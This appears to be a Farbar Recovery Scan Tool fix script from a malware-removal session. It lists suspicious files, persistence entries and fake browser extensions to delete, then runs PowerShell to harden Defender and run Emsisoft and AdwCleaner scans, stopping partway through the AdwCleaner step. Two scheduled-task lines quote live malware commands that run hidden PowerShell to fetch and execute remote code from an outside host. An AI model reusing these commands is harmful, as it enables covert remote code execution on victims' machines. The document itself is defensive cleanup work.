Manic5467 - Fenris

content copied
content

Start::
CreateRestorePoint:
CloseProcesses:

2026-04-26 13:33 - 2026-04-26 13:33 - 000078848 ____N () [File not signed] C:\Users\marle\mm.exe\Plugins.Opera.dll
2026-04-26 13:33 - 2026-04-26 13:33 - 002800128 _____ () [File not signed] C:\Users\marle\mm.exe\SDL3.dll
2026-04-26 13:33 - 2026-04-26 13:33 - 000065536 _____ (Lamantine Software a.s.) [File not signed] C:\Users\marle\mm.exe\cvFormat.dll
2026-04-26 13:33 - 2026-04-26 13:33 - 000139352 _____ (Tenorshare (Hongkong) Limited -> ) [File not signed] C:\Users\marle\mm.exe\avdevice-59.dll
(svchost.exe ->) (Tenorshare (Hongkong) Limited -> Tenorshare) C:\Users\marle\mm.exe\MediaInfoService.exe
HKU\S-1-5-21-2270404040-1862323974-1284162387-1001\...\Run: [Media Info Service] => C:\Users\marle\mm.exe\MediaInfoService.exe [2083928 2026-04-26] (Tenorshare (Hongkong) Limited -> Tenorshare) <==== ATTENTION
Task: {BCEA2C7C-DA5A-482B-AB6B-6C5A24279109} - System32\Tasks\Media Info Service => C:\Users\marle\mm.exe\MediaInfoService.exe [2083928 2026-04-26] (Tenorshare (Hongkong) Limited -> Tenorshare) <==== ATTENTION
CHR Extension: (Volume Booster) - C:\Users\marle\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\anmbbeeiaollmpadookgoakpfjkbidaf [2024-02-10]
CHR Extension: (Adblock for YouTube™) - C:\Users\marle\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\jpefmbpcbebpjpmelobfakahfdcgcmkl [2025-10-15]
2026-04-26 13:34 - 2026-04-26 13:34 - 000000000 ____D C:\Users\marle\AppData\Local\Yandex
2026-04-26 13:33 - 2026-04-26 13:33 - 000000000 ____D C:\Users\marle\mm.exe
Edge Extension: (Google Docs) - C:\Users\marle\AppData\Local\elram\llg [2026-04-26] [UpdateUrl:0] <==== ATTENTION
CHR Extension: (Google Docs) - C:\Users\marle\AppData\Local\elram\llg [2026-04-26] [UpdateUrl:0] <==== ATTENTION
2026-04-26 13:32 - 2026-04-26 13:32 - 000000000 ____D C:\Users\marle\AppData\Roaming\RenPy
AlternateDataStreams: C:\WINDOWS\tracing:? [16]
AlternateDataStreams: C:\WINDOWS\system32\Drivers\bobbrlio.sys:changelist [296]
AlternateDataStreams: C:\WINDOWS\system32\Drivers\qdcnsumf.sys:changelist [296]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access.lnk:A1B76439FE [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel.lnk:B96E9B8455 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\JBL QuantumENGINE.lnk:DB4CD983BC [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote.lnk:60EC9648C0 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OpenShot Video Editor.lnk:1873A810D8 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook (classic).lnk:5465085A2F [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook (classic).lnk:BE800952D3 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint.lnk:1DC1525F34 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Publisher.lnk:104946E0EA [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sticky Notes (new).lnk:3DF0A9C0EF [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word.lnk:7AD7FA8AB1 [4298]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [7804]
FirewallRules: [UDP Query User{565ADCF0-B64C-4A66-8FC7-9150BC48BD7C}C:\program files (x86)\steam\steamapps\common\baldurs gate 3\bin\bg3_dx11.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\baldurs gate 3\bin\bg3_dx11.exe => No File
FirewallRules: [TCP Query User{48327B13-B811-423C-AE95-354007579A77}C:\program files (x86)\steam\steamapps\common\baldurs gate 3\bin\bg3_dx11.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\baldurs gate 3\bin\bg3_dx11.exe => No File
FirewallRules: [UDP Query User{C3378123-B145-48F1-8B61-E85F607AA213}C:\program files (x86)\steam\steamapps\common\fragpunkplaytest\fragpunk\binaries\win64\fragpunk.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\fragpunkplaytest\fragpunk\binaries\win64\fragpunk.exe => No File
FirewallRules: [TCP Query User{A1A67F49-5E02-43E7-8D76-05191BC19181}C:\program files (x86)\steam\steamapps\common\fragpunkplaytest\fragpunk\binaries\win64\fragpunk.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\fragpunkplaytest\fragpunk\binaries\win64\fragpunk.exe => No File
FirewallRules: [UDP Query User{06507BA9-ACCF-4385-9B71-D20D70FDC24A}C:\riot games\riot client\riotclientelectron\riot client.exe] => (Allow) C:\riot games\riot client\riotclientelectron\riot client.exe => No File
FirewallRules: [TCP Query User{8EB4F17F-E9BC-44EE-BE91-D16A1B3F96F1}C:\riot games\riot client\riotclientelectron\riot client.exe] => (Allow) C:\riot games\riot client\riotclientelectron\riot client.exe => No File
FirewallRules: [{EE6E72EA-AD50-4F32-AE25-24623599F2D6}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Team Fortress 2\hl2.exe => No File
FirewallRules: [{E7297D14-BDDD-445A-A525-9E1994D33BD4}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Team Fortress 2\hl2.exe => No File
FirewallRules: [{30F2A71F-38C7-4C38-88AE-C84897411CD1}] => (Allow) C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_4fc38a913e0f2ea5\ASUSLinkRemote\AsusLinkRemoteAgent.exe => No File
FirewallRules: [{3510CA42-4C7F-4BD4-9BED-5A951A755FE9}] => (Allow) C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_4fc38a913e0f2ea5\ASUSLinkRemote\AsusLinkRemoteAgent.exe => No File
FirewallRules: [UDP Query User{903FDB9D-44D3-4A3D-96E7-B028D47622BD}C:\program files (x86)\steam\steamapps\common\grand theft auto v\gta5.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\grand theft auto v\gta5.exe => No File
FirewallRules: [TCP Query User{C3F35618-4FD6-4761-9322-792464AF1FAD}C:\program files (x86)\steam\steamapps\common\grand theft auto v\gta5.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\grand theft auto v\gta5.exe => No File
FirewallRules: [UDP Query User{761B43E2-9F78-4DA3-8B16-BEC0C36B5AF5}C:\program files (x86)\steam\steamapps\common\tmodloader\dotnet\6.0.14\dotnet.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\tmodloader\dotnet\6.0.14\dotnet.exe => No File
FirewallRules: [TCP Query User{DA33AC07-7229-405A-A775-D16FCCDCAD27}C:\program files (x86)\steam\steamapps\common\tmodloader\dotnet\6.0.14\dotnet.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\tmodloader\dotnet\6.0.14\dotnet.exe => No File
FirewallRules: [{10600936-1C3B-442A-A2AE-6D727CE0526B}] => (Allow) D:\SteamLibrary\steamapps\common\ELDEN RING\Game\start_protected_game.exe => No File
FirewallRules: [{4D44EFE5-2E32-40EF-9837-F622D5D599EB}] => (Allow) D:\SteamLibrary\steamapps\common\ELDEN RING\Game\start_protected_game.exe => No File
FirewallRules: [UDP Query User{163720D2-ECA6-4CC5-8A0E-594B6D6D9D44}D:\steamlibrary\steamapps\common\baldurs gate 3\bin\bg3_dx11.exe] => (Allow) D:\steamlibrary\steamapps\common\baldurs gate 3\bin\bg3_dx11.exe => No File
FirewallRules: [TCP Query User{88365EF1-DB6E-4F4B-BF72-B1064E15C66E}D:\steamlibrary\steamapps\common\baldurs gate 3\bin\bg3_dx11.exe] => (Allow) D:\steamlibrary\steamapps\common\baldurs gate 3\bin\bg3_dx11.exe => No File
FirewallRules: [UDP Query User{4D8B605F-A147-49A5-87F7-90241A9854FE}C:\riot games\riot client\riotclientservices.exe] => (Allow) C:\riot games\riot client\riotclientservices.exe => No File
FirewallRules: [TCP Query User{D003E968-0EC9-43CC-B8FE-4A2CFD13E51C}C:\riot games\riot client\riotclientservices.exe] => (Allow) C:\riot games\riot client\riotclientservices.exe => No File
FirewallRules: [UDP Query User{4C76035E-3DC0-4EE6-B134-F358BBF29FA6}C:\riot games\valorant\live\shootergame\binaries\win64\valorant-win64-shipping.exe] => (Allow) C:\riot games\valorant\live\shootergame\binaries\win64\valorant-win64-shipping.exe => No File
FirewallRules: [TCP Query User{0FF39529-6A0F-491A-B305-22F3591DB606}C:\riot games\valorant\live\shootergame\binaries\win64\valorant-win64-shipping.exe] => (Allow) C:\riot games\valorant\live\shootergame\binaries\win64\valorant-win64-shipping.exe => No File
FirewallRules: [UDP Query User{979E7CB8-1A79-4046-9EC8-1AE3B2DA3FAE}C:\xboxgames\hello neighbor 2\content\helloneighbor2\binaries\wingdk\helloneighbor2-wingdk-shipping.exe] => (Allow) C:\xboxgames\hello neighbor 2\content\helloneighbor2\binaries\wingdk\helloneighbor2-wingdk-shipping.exe => No File
FirewallRules: [TCP Query User{AB98616C-8362-420E-8938-C2C5893E00F8}C:\xboxgames\hello neighbor 2\content\helloneighbor2\binaries\wingdk\helloneighbor2-wingdk-shipping.exe] => (Allow) C:\xboxgames\hello neighbor 2\content\helloneighbor2\binaries\wingdk\helloneighbor2-wingdk-shipping.exe => No File
FirewallRules: [UDP Query User{CC7A587D-33ED-4B29-A219-B79D3C44291F}C:\program files (x86)\ubisoft\ubisoft game launcher\games\tom clancy's rainbow six siege\rainbowsix_vulkan.exe] => (Allow) C:\program files (x86)\ubisoft\ubisoft game launcher\games\tom clancy's rainbow six siege\rainbowsix_vulkan.exe => No File
FirewallRules: [TCP Query User{523FE553-9660-4157-A839-0EC53D00D382}C:\program files (x86)\ubisoft\ubisoft game launcher\games\tom clancy's rainbow six siege\rainbowsix_vulkan.exe] => (Allow) C:\program files (x86)\ubisoft\ubisoft game launcher\games\tom clancy's rainbow six siege\rainbowsix_vulkan.exe => No File
FirewallRules: [UDP Query User{5251D614-B40C-4942-A6F4-53DD29FA28C8}C:\program files (x86)\steam\steamapps\common\cyberpunk 2077\bin\x64\cyberpunk2077.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\cyberpunk 2077\bin\x64\cyberpunk2077.exe => No File
FirewallRules: [TCP Query User{221C7D38-7288-443A-BA7D-B70407385B2F}C:\program files (x86)\steam\steamapps\common\cyberpunk 2077\bin\x64\cyberpunk2077.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\cyberpunk 2077\bin\x64\cyberpunk2077.exe => No File
FirewallRules: [{3809C49E-FFD5-412B-9F80-6C841810EBAD}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's Rainbow Six Siege\RainbowSix.exe => No File
FirewallRules: [{E5FE0E30-C83F-4229-A632-2DCEFADC7333}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's Rainbow Six Siege\RainbowSix.exe => No File
FirewallRules: [{D914A038-BC0C-4217-B4CD-8AF9511D82B6}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's Rainbow Six Siege\RainbowSix_BE.exe => No File
FirewallRules: [{3C01BCB7-A5B4-4F10-9088-9AAF5854EF20}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's Rainbow Six Siege\RainbowSix_BE.exe => No File
FirewallRules: [UDP Query User{56A2BAF4-A91C-43E3-B562-FCEAEA59F8B7}D:\steamlibrary\steamapps\common\red dead redemption 2\rdr2.exe] => (Allow) D:\steamlibrary\steamapps\common\red dead redemption 2\rdr2.exe => No File
FirewallRules: [TCP Query User{A56DD956-B177-4AE4-BD41-828DAA98F130}D:\steamlibrary\steamapps\common\red dead redemption 2\rdr2.exe] => (Allow) D:\steamlibrary\steamapps\common\red dead redemption 2\rdr2.exe => No File
FirewallRules: [UDP Query User{10130969-AC8F-48BD-BA75-DFDAA20E79BD}C:\program files (x86)\overwatch\_retail_\overwatch.exe] => (Allow) C:\program files (x86)\overwatch\_retail_\overwatch.exe => No File
FirewallRules: [TCP Query User{43E662DB-66ED-49EA-9A61-101EBF1AC1D9}C:\program files (x86)\overwatch\_retail_\overwatch.exe] => (Allow) C:\program files (x86)\overwatch\_retail_\overwatch.exe => No File
FirewallRules: [{C35195E6-B243-460D-BD07-B293DE6B5B62}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\FarCry5\bin\ArcadeEditor64.exe => No File
FirewallRules: [{11480C47-C9F5-48FD-846D-FA4B58E33C28}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\FarCry5\bin\ArcadeEditor64.exe => No File
FirewallRules: [{26B8DB4D-F42A-48B0-83F1-0BA9E6BE3FC4}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ELDEN RING\Game\start_protected_game.exe => No File
FirewallRules: [{97916C85-1217-4F84-BD31-4ACB98CD775C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ELDEN RING\Game\start_protected_game.exe => No File
FirewallRules: [{8C9F7AFF-43D1-4CAE-B4E0-CE1AA1D6E500}] => (Allow) C:\Program Files\Oculus\Support\oculus-client\OculusClient.exe => No File
FirewallRules: [{220EDF46-5088-41D1-9D66-A8E4B687AF62}] => (Allow) C:\Program Files\Oculus\Support\oculus-client\OculusClient.exe => No File
FirewallRules: [{F5149303-83C9-4FFC-B74C-E804354962A6}] => (Allow) C:\Program Files\Oculus\Support\oculus-worlds\Engine\Binaries\Win64\UnrealCEFSubProcess.exe => No File
FirewallRules: [{CAD5FE53-47B4-4DD4-84C6-40AE9B57DA5A}] => (Allow) C:\Program Files\Oculus\Support\oculus-worlds\Engine\Binaries\Win64\UnrealCEFSubProcess.exe => No File
FirewallRules: [{CA25EA67-66E4-4608-BAA2-74E15C56E96E}] => (Allow) C:\Program Files\Oculus\Support\oculus-worlds\Home2\Binaries\Win64\Home2-Win64-Shipping.exe => No File
FirewallRules: [{376AD331-F87D-4020-8766-9F64262F2D5E}] => (Allow) C:\Program Files\Oculus\Support\oculus-worlds\Home2\Binaries\Win64\Home2-Win64-Shipping.exe => No File
FirewallRules: [{79B62F47-1FE5-442B-8ADC-1E8CF1262592}] => (Allow) C:\Program Files\Oculus\Support\oculus-worlds\Home2.exe => No File
FirewallRules: [{26475443-ECB6-43D5-A31D-9CB1F2BB25DE}] => (Allow) C:\Program Files\Oculus\Support\oculus-worlds\Home2.exe => No File
FirewallRules: [{9339A019-5594-44E6-8B66-E72BB96C02C7}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SteamVR\bin\win32\vrstartup.exe => No File
FirewallRules: [{C2B09B6E-58C3-415C-87F8-4AB1FAFC8A31}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SteamVR\bin\win32\vrstartup.exe => No File
FirewallRules: [{1EEC6050-9E16-43BC-A080-979AFA7D86B8}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe => No File
FirewallRules: [{11BA6441-16C4-4200-BD70-6D63FA1F8B37}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => No File
FirewallRules: [{17662A87-853E-433D-9287-00CA4E2614C0}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => No File
FirewallRules: [TCP Query User{886ADE20-B4AC-4CE8-A5B3-FE406EAFE5D8}D:\steamlibrary\steamapps\common\projectzomboid\jre64\bin\java.exe] => (Allow) D:\steamlibrary\steamapps\common\projectzomboid\jre64\bin\java.exe => No File
FirewallRules: [UDP Query User{FE8F0DF3-5AFA-4486-BB26-F055D4F1E180}D:\steamlibrary\steamapps\common\projectzomboid\jre64\bin\java.exe] => (Allow) D:\steamlibrary\steamapps\common\projectzomboid\jre64\bin\java.exe => No File
FirewallRules: [TCP Query User{0BC6F835-5EBE-4D66-B0A1-0913FC0EE0FB}C:\program files (x86)\steam\steamapps\common\star wars battlefront ii\starwarsbattlefrontii.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\star wars battlefront ii\starwarsbattlefrontii.exe => No File
FirewallRules: [UDP Query User{85FFBE14-5120-4C2A-A9E2-2DF79D7E32E3}C:\program files (x86)\steam\steamapps\common\star wars battlefront ii\starwarsbattlefrontii.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\star wars battlefront ii\starwarsbattlefrontii.exe => No File
FirewallRules: [TCP Query User{D55AB2A5-8857-4F5B-8E20-2B967D6C27DC}C:\program files (x86)\steam\steamapps\common\red dead redemption 2\rdr2.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\red dead redemption 2\rdr2.exe => No File
FirewallRules: [UDP Query User{D3CA00B4-5296-409A-8FD2-CC95F9E2568D}C:\program files (x86)\steam\steamapps\common\red dead redemption 2\rdr2.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\red dead redemption 2\rdr2.exe => No File
FirewallRules: [TCP Query User{D8402684-B45A-4227-B90A-C577BBE67B2B}D:\steamlibrary\steamapps\common\pvzgw2\gw2.main_win64_retail.exe] => (Allow) D:\steamlibrary\steamapps\common\pvzgw2\gw2.main_win64_retail.exe => No File
FirewallRules: [UDP Query User{D8EB95B2-E2B7-4AD8-8320-FEB7C5042010}D:\steamlibrary\steamapps\common\pvzgw2\gw2.main_win64_retail.exe] => (Allow) D:\steamlibrary\steamapps\common\pvzgw2\gw2.main_win64_retail.exe => No File
FirewallRules: [{E47FB11B-1208-495F-B16E-74623C1E3298}] => (Allow) D:\SteamLibrary\steamapps\common\Ready Or Not\Engine\Binaries\Win64\CrashReporter.exe => No File
FirewallRules: [{F6802076-B2C9-4DFA-A020-06DF36895D09}] => (Allow) D:\SteamLibrary\steamapps\common\Ready Or Not\Engine\Binaries\Win64\CrashReporter.exe => No File
FirewallRules: [TCP Query User{C713F153-E581-4F05-A263-9B3CA67C97A4}D:\steamlibrary\steamapps\common\ready or not\readyornot\binaries\win64\readyornotsteam-win64-shipping.exe] => (Allow) D:\steamlibrary\steamapps\common\ready or not\readyornot\binaries\win64\readyornotsteam-win64-shipping.exe => No File
FirewallRules: [UDP Query User{C67D17DB-0ABD-4FED-95AD-E71D0E6A8972}D:\steamlibrary\steamapps\common\ready or not\readyornot\binaries\win64\readyornotsteam-win64-shipping.exe] => (Allow) D:\steamlibrary\steamapps\common\ready or not\readyornot\binaries\win64\readyornotsteam-win64-shipping.exe => No File
FirewallRules: [TCP Query User{C441FBCF-A401-4ECD-B607-CB5A3DE35FFC}D:\steamlibrary\steamapps\common\pvzgw2\gw2.main_win64_retail.exe] => (Allow) D:\steamlibrary\steamapps\common\pvzgw2\gw2.main_win64_retail.exe => No File
FirewallRules: [UDP Query User{9CB95DC4-9C31-4402-904D-27386467A6BD}D:\steamlibrary\steamapps\common\pvzgw2\gw2.main_win64_retail.exe] => (Allow) D:\steamlibrary\steamapps\common\pvzgw2\gw2.main_win64_retail.exe => No File
FirewallRules: [{51D007BE-F3BD-4DDD-B709-F7A65578EA91}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Drunk Driving Simulator\DDS.exe => No File
FirewallRules: [{96B83676-8C61-4824-9F9B-3040AB9A26BB}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Drunk Driving Simulator\DDS.exe => No File
FirewallRules: [{0EF69C8E-8BD0-459D-AA71-381269875788}] => (Allow) D:\SteamLibrary\steamapps\common\Warframe\Tools\Launcher.exe => No File
FirewallRules: [{61220834-B2B7-48E3-891A-12A78540DE0C}] => (Allow) D:\SteamLibrary\steamapps\common\Warframe\Tools\Launcher.exe => No File
FirewallRules: [TCP Query User{52858366-3E32-487B-BF40-6B50FCDB7B98}C:\program files (x86)\steam\steamapps\common\smalland\smalland\binaries\win64\smalland-win64-shipping.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\smalland\smalland\binaries\win64\smalland-win64-shipping.exe => No File
FirewallRules: [UDP Query User{430E9E47-5BB8-4ED0-8F80-52D9E751D2A4}C:\program files (x86)\steam\steamapps\common\smalland\smalland\binaries\win64\smalland-win64-shipping.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\smalland\smalland\binaries\win64\smalland-win64-shipping.exe => No File
FirewallRules: [TCP Query User{1BAD1E41-2008-4FAF-9E22-8123D5CA58DD}C:\program files (x86)\steam\steamapps\common\tom clancy's rainbow six siege\rainbowsix.exe] => (Block) C:\program files (x86)\steam\steamapps\common\tom clancy's rainbow six siege\rainbowsix.exe => No File
FirewallRules: [UDP Query User{BDB769BE-407E-47C6-9942-8290137519F6}C:\program files (x86)\steam\steamapps\common\tom clancy's rainbow six siege\rainbowsix.exe] => (Block) C:\program files (x86)\steam\steamapps\common\tom clancy's rainbow six siege\rainbowsix.exe => No File
FirewallRules: [{D6188688-80DD-4B06-B32E-BCDBF04BCCE9}] => (Allow) C:\Program Files (x86)\Overwolf\0.296.2.1\OverwolfBrowser.exe => No File
FirewallRules: [{7BA21463-1D91-4466-8627-97D9BB0E4C7D}] => (Allow) C:\Program Files (x86)\Overwolf\0.296.2.1\OverwolfBrowser.exe => No File
FirewallRules: [{CFA1BB4D-69BE-418B-BFDE-7AD30F2D2E1C}] => (Block) C:\Program Files (x86)\Overwolf\0.296.2.1\OverwolfBrowser.exe => No File
FirewallRules: [{D325B120-3E98-4F5F-94CC-23B268594F66}] => (Block) C:\Program Files (x86)\Overwolf\0.296.2.1\OverwolfBrowser.exe => No File
HKU\S-1-5-21-2270404040-1862323974-1284162387-1001\...\RunOnce: [Delete Cached Update Binary] => C:\WINDOWS\system32\cmd.exe /q /c del /q "C:\Users\marle\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe" (No File)
Task: {348186DC-FB68-4B43-AA5D-DCF1F65E73A0} - System32\Tasks\ASUS\P508PowerAgent_sdk => C:\Program Files (x86)\ASUS\ArmouryDevice\dll\ShareFromArmouryIII\Mouse\ROG STRIX CARRY\P508PowerAgent.exe  (No File)
Task: {077BA067-7C15-40F0-B22E-C9DC2A54B4A2} - System32\Tasks\Microsoft\Windows\Location\Notifications => %windir%\System32\LocationNotificationWindows.exe  (No File)
Task: {F3E6E7ED-A196-4E44-8803-55FAB3AD4E29} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe  (No File)
S3 cpuz158; \??\C:\WINDOWS\temp\cpuz158\cpuz158_x64.sys (No File) <==== ATTENTION
S3 cpuz159; \??\C:\WINDOWS\temp\cpuz159\cpuz159_x64.sys (No File) <==== ATTENTION
S3 cpuz160; \??\C:\WINDOWS\temp\cpuz160\cpuz160_x64.sys (No File) <==== ATTENTION
S3 EAAntiCheat; system32\drivers\eaanticheat.sys (No File)
2025-03-03 22:25 - 2025-03-03 22:25 - 000000024 _____ () C:\Users\marle\AppData\Roaming\C23W6Vk43XTwu662.dat
2025-11-27 20:21 - 2025-11-27 20:21 - 000000048 ____R () C:\Users\marle\AppData\Local\0119AC2FC90D95AC063B177717B7B3B6
2024-12-06 13:34 - 2024-12-06 13:34 - 000000048 ____R () C:\Users\marle\AppData\Local\B7E86F3D63FF6AC3FC92E35B2B2180B9
HKU\S-1-5-21-2270404040-1862323974-1284162387-1001\...\RunOnce: [Uninstall 26.062.0402.0002_1] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\marle\AppData\Local\Microsoft\OneDrive\26.062.0402.0002_1" [0 2026-05-05] () <==== ATTENTION [zero byte File/Folder]
Task: {5E751CBB-B664-4D96-A147-71C33C4D4BFF} - System32\Tasks\Google Compatibility Appraiser CL_NCL_581fdfb9e67e5b54 => C:\Windows\system32\conhost.exe [1003520 2026-04-15] (Microsoft Windows -> Microsoft Corporation) -> --headless C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -ExecutionPolicy Bypass -WindowStyle Hidden -Command "if(!(Get-Process CheckNetIsolation,CloudExperienceHostBroker -EA 0)){Invoke-RestMethod 79.8141710/cl-ncl-following | Invoke-Expression}else{exit 1}" <==== ATTENTION
Task: {FF37DBA5-A263-4396-813E-52A2FA1D8816} - System32\Tasks\GoogleSystem\GoogleUpdater\GoogleUpdaterTaskSystem47.0.7703.CL_NCL_581fdfb9e67e5b54{47263A17-2D66-43B9-9692-56314D0C1AEC} => C:\Windows\system32\conhost.exe [1003520 2026-04-15] (Microsoft Windows -> Microsoft Corporation) -> --headless C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -ExecutionPolicy Bypass -WindowStyle Hidden -Command "if(!(Get-Process CheckNetIsolation,CloudExperienceHostBroker -EA 0)){Invoke-RestMethod 79.8141710/cl-ncl-following | Invoke-Expression}else{exit 1}" <==== ATTENTION

C:\Users\marle\AppData\Local\elram
2026-04-26 13:30 - 2026-04-26 13:30 - 760231840 _____ C:\Users\marle\Downloads\Archive.zip
2026-04-26 13:33 - 2026-04-26 13:33 - 000004376 _____ C:\WINDOWS\system32\Tasks\Google Compatibility Appraiser CL_NCL_581fdfb9e67e5b54
2023-02-23 21:07 - 2023-02-23 21:07 - 000006598 _____ () C:\Users\marle\AppData\Local\92761170034
2023-03-05 18:33 - 2023-03-05 18:33 - 000006598 _____ () C:\Users\marle\AppData\Local\93803181808


StartPowerShell:
# Enable real-time protection
Set-MpPreference -DisableRealtimeMonitoring $false

# Enable behavioural protection
Set-MpPreference -DisableBehaviorMonitoring $false

# Enable PUP detection
Set-MpPreference -PUAProtection Enabled

# Enable cloud protection to level 4 - aggressively block unknowns and apply additional protection measures, alternatively use 2 for lower protection or 0 for default
Set-MpPreference -CloudBlockLevel 4

# Send advanced information about malicious/unwanted software present on your device
Set-MpPreference -MAPSReporting 2

# Send safe samples automatically to Microsoft
Set-MpPreference -SubmitSamplesConsent 1

# Enables inspection of HTTP traffic to detect malicious websites
Set-MpPreference -EnableNetworkProtection Enabled

# Enables block at first seen
Set-MpPreference -DisableBlockAtFirstSeen $false

# Allows scanning of archive files, such as .zip and .cab files for malware/PUP
Set-MpPreference -DisableArchiveScanning $false

# Enables automatic scanning of USB & removal drives
Set-MpPreference -DisableRemovableDriveScanning $false

# Enables scanning of network files
Set-MpPreference -DisableScanningNetworkFiles $false

# Forces signature check before running a scan
Set-MpPreference -CheckForSignaturesBeforeRunningScan $true

# Extends cloud check timer from default 10 to 30 seconds
Set-MpPreference -CloudExtendedTimeout 30

# Enables automatic scanning of all downloaded files and attachments
Set-MpPreference -DisableIOAVProtection $false

# Enables script detection
Set-MpPreference -DisableScriptScanning $false

# Disables automatic exclusions from scanning
Set-MpPreference -DisableAutoExclusions 1

# Enables scanning of mapped network drives
Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 0

# Enables scanning of email files
Set-MpPreference -DisableEmailScanning 0

# Enables blocking of malicious domains and IP's on DNS level
Set-MpPreference -EnableDnsSinkhole $true

# Enables signature updates every 12 hours
Set-MpPreference -SignatureUpdateInterval 12

# Enables automatic quarantine for threats labelled as high and severe
Set-MpPreference -HighThreatDefaultAction Quarantine
Set-MpPreference -SevereThreatDefaultAction Quarantine

# Updates signatures
Update-MpSignature
EndPowerShell:


StartPowerShell:
# This snippet downloads Emsisoft Emergency Kit (EEK) from the Emsisoft's official site, updates it, scans with it.
# Do note that the executable is 300MB and may take some time to download.
# ---
# This will scan for malware and PUP's in 1) system memory 2) important folders as documentation says
# It will scan in compressed archives, in mail archives, in NTFS alternate data streams and use cloud requests
# ---
# You can use argument "/delete" to delete found objects including references but this is permanent and irreversible.
# You can remove the "/quick" argument to do a full scan but that may take longer than what FRST can handle.
# You can use argument "/quarantine="[folder]"" to put found malware into quarantine, but I personally prefer first verifying the detections.
$downloadUrl = "https://dl.emsisoft.com/EmsisoftEmergencyKit.exe"
$systemDrive = $env:SystemDrive
$frstPath = "$systemDrive\FRST"
$savePath = "$frstPath\EEK.exe"
$extractPath = "$frstPath\EEK"
if (-not (Test-Path $frstPath)) {
    New-Item -Path $frstPath -ItemType Directory -Force | Out-Null
}
if (-not (Test-Path $extractPath)) {
    New-Item -Path $extractPath -ItemType Directory -Force | Out-Null
}
Invoke-WebRequest -Uri $downloadUrl -OutFile $savePath -UseBasicParsing
$proc = Start-Process -FilePath $savePath -ArgumentList "-s -d`"$extractPath`"" -PassThru
while (-not (Test-Path "$extractPath\bin64\a2cmd.exe")) { Start-Sleep -Milliseconds 1000 }
Stop-Process -Id $proc.Id -Force -ErrorAction SilentlyContinue
if ([Environment]::Is64BitOperatingSystem) {
    $a2cmdPath = Join-Path $extractPath "bin64\a2cmd.exe"
} else {
    $a2cmdPath = Join-Path $extractPath "bin32\a2cmd.exe"
}
Start-Process -FilePath $a2cmdPath -ArgumentList "/update" -Wait -NoNewWindow
Start-Process -FilePath $a2cmdPath -ArgumentList "/malware /quick /m /t /pup /a /am /cloud=1 /la=`"$frstPath\EEK_scan.log`"" -Wait -NoNewWindow
Get-Content "$frstPath\EEK_scan.log"
exit
EndPowerShell:

StartPowerShell:
# Downloads newest AdwCleaner version directly from Malwarebytes, performs an update, scans, cleans and writes the log in console
# Does not clean preinstalled objects, only PUP/Adware
# If you would like to delete preinstalled objects, add an argument /preinstalled to the /clean argument
# If you would like to only scan with it, change the argument from /clean to /scan

New-Item -ItemType Directory -Force -Path "$env:SystemDrive\AdwCleaner" | Out-Null
